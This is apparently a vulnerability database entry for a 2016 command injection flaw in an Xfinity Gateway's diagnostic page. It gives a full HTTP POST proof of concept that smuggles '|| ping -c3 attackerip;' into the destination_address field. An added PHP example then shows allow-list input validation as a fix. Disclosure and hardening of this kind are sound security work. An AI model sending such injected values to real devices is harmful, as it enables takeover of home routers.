ID
VAR-E-201612-0455
TITLE
Xfinity Gateway - Remote Code Execution Vulnerability
Trust: 0.6
AFFECTED PRODUCTS
vendor: | xfinity | model: | gateway | scope: | - | version: | - | Trust: 0.6 |
EXPLOIT
# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: [email protected]
# Vendor Homepage: http://xfinity.com
# Platform: php
The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a POST request to /actionHandler/ajax_network_diagnostic_tools.php. The destination_address parameter is vulnerable to command injection.
PoC:
POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
If you open Wireshark and apply the display filter ip.dst==attackerip and icmp, you will see that the router issues 3 ICMP echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
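A hardened way to handle destination_address on the server side, added here as an example (it is not the gateway's code, which this page does not show). The function names, the cap of 10 echo requests and the reading of count1 as the ping count are assumptions:

```php
<?php
// Added example, not the gateway's code. Function names and limits are hypothetical.

// Accept only a literal IP address or a plain DNS hostname; return null otherwise.
function validate_destination(string $raw): ?string
{
    $value = trim($raw);
    if ($value === '' || strlen($value) > 253) {
        return null;
    }
    if (filter_var($value, FILTER_VALIDATE_IP) !== false) {
        return $value;
    }
    // Dot-separated labels of letters, digits and inner hyphens. Whitespace, |, ;, &,
    // $, quotes, backticks and a leading "-" (option injection) cannot match.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (preg_match('/\A' . $label . '(?:\.' . $label . ')*\z/', $value) === 1) {
        return $value;
    }
    return null;
}

// Assumption: count1 is the number of echo requests; cap it at 10.
function validate_count(string $raw): ?int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 10]]);
    return $n === false ? null : $n;
}

// Build the ping command only from validated values; null means reject the request.
function build_ping_command(string $destination, string $count): ?string
{
    $host = validate_destination($destination);
    $n = validate_count($count);
    if ($host === null || $n === null) {
        return null;
    }
    // escapeshellarg() is a second layer in case the command still goes through a shell.
    return 'ping -c ' . $n . ' ' . escapeshellarg($host);
}

// Constructed sample inputs: two legitimate values and the value from the PoC above.
$samples = ['www.comcast.net', '10.0.0.1', 'www.comcast.net || ping -c3 attackerip; '];
foreach ($samples as $s) {
    $cmd = build_ping_command($s, '4');
    printf("%-44s => %s\n", json_encode($s), $cmd ?? 'REJECTED');
}
```

The allow-list does the real work: the value from the PoC is rejected before any command string exists, so nothing reaches the shell to be interpreted.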
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Code Execution Vulnerability
Trust: 0.6
EXTERNAL IDS
db: | 0DAYTODAY | id: | 26462 | Trust: 0.6 |
db: | EDBNET | id: | 89421 | Trust: 0.6 |
REFERENCES
url: | https://0day.today/exploits/26462 | Trust: 0.6 |
SOURCES
db: | EDBNET | id: | 89421 |
LAST UPDATE DATE
2022-07-27T10:00:43.692000+00:00
SOURCES RELEASE DATE
db: | EDBNET | id: | 89421 | date: | 2016-12-05T00:00:00 |